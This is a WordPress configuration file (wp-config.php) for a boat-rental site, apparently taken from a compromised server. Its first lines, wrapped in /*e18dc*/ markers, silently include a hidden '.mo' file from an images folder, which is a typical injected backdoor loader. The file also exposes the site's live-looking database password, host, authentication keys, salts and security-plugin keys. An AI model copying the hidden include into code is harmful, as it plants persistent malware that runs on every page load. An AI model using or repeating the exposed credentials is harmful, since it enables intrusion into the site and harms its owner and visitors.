File: /home/z/w/a/zwafgyp/locationdebateau/wp-config.php
<?php
/*e18dc*/
@include ("/home/zwafgyp/locationdebateau/wp-includes/images/media/.0f8e49c2.mo");
/*e18dc*/
define('WP_CACHE', true);
define( 'WPCACHEHOME', '/home/zwafgyp/locationdebateau/wp-content/plugins/wp-super-cache/' );
define('FS_METHOD', 'direct');
define('FORCE_SSL_ADMIN', true);
define('WP_HOME','https://www.locationdebateaux.com/');
define('WP_SITEURL','https://www.locationdebateaux.com/');
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'zwafgypldp' );
/** MySQL database username */
define( 'DB_USER', 'zwafgypldp' );
/** MySQL database password */
define( 'DB_PASSWORD', 'aLUXbJrzfAnDm52K' );
/** MySQL hostname */
define( 'DB_HOST', 'zwafgypldp.mysql.db' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '6e}K@:F}f:_jvNB?b*&P[zP>+e,]~{o#({ITZxNySrN0(:BfSeGIuBr@I?a_G(1t' );
define( 'SECURE_AUTH_KEY', '|HB:etp.T2Auc*u[80Dj<}`(Yc]2%&n, [QDC7LK_qi8B#du8hntRwN&)NTUTyE;' );
define( 'LOGGED_IN_KEY', '=a5m ,%XH$07CNHx~!~rZHGrR6U?L7}=^]JSL.7-<GYgu#cp;phEoFgrvR9:mu?Y' );
define( 'NONCE_KEY', '0*=I7^6y$-i vW](s!-(C9Z.OX1HP>djfmI[g&3V}~jVBD&qV7<!3}3?Pw(Ch39A' );
define( 'AUTH_SALT', 'n6~}^ss`,n/mhK/X?&i<HMDmqdqzAhm^X3kO *]&fV#/ql=j/(82%,L8jSeuWy=k' );
define( 'SECURE_AUTH_SALT', 'My,O1(=#r4&/Xr2Q7UK@QON}A2ot;<Qs?LCQ3o6Fkn,:IQRe.2v>(C2h/^yii5&w' );
define( 'LOGGED_IN_SALT', '?{SpE@<?nq+r3.z9]6WHU|! weGMH|_A[uaDSj&T_S6SxuU>!,WErvpl*Qgcu[#W' );
define( 'NONCE_SALT', 'I(xV2!(!AC@U}}&cfiF|g,1Da7:nuYudH0|;(nu0zfm:!pz?zx[IfbQjC=#}={!i' );
define( 'WP_CACHE_KEY_SALT', '5K/^%!|,@Yq!+h~EHlZR6=Lk0yO+@<(oB8Brkd%m2t?%)<Y9[AWX80Z~yD.9;9hs' );
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'NVkRwLVN';
// define('WP_DEBUG', true );
// define('WP_DEBUG_LOG', true );
define('SUCURI_PLUG_KEY', '013a24c365b627d081a7c60679f531ca043222861a88e8c73e624e3119af950c');
define('SUCURI_PLUG_SALT', '7c5f8ee4932fac315798b66d0e180f459b02db71941b1c49611506c4a252390f');
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';